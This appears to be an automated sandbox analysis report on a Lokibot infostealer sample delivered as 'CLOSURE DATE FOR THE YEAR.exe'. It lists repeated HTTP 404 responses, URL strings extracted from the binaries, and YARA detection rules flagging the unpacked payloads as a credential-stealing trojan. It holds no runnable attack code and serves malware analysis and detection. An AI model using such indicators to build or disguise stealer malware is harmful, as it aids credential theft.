                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:54:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:54:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: IOsbBBIDAm.exe, 00000009.00000002.2066244082.00000000027D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1754216796.00000000027E9000.00000004.00000800.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2066244082.00000000027D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                System Summary

                barindex
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
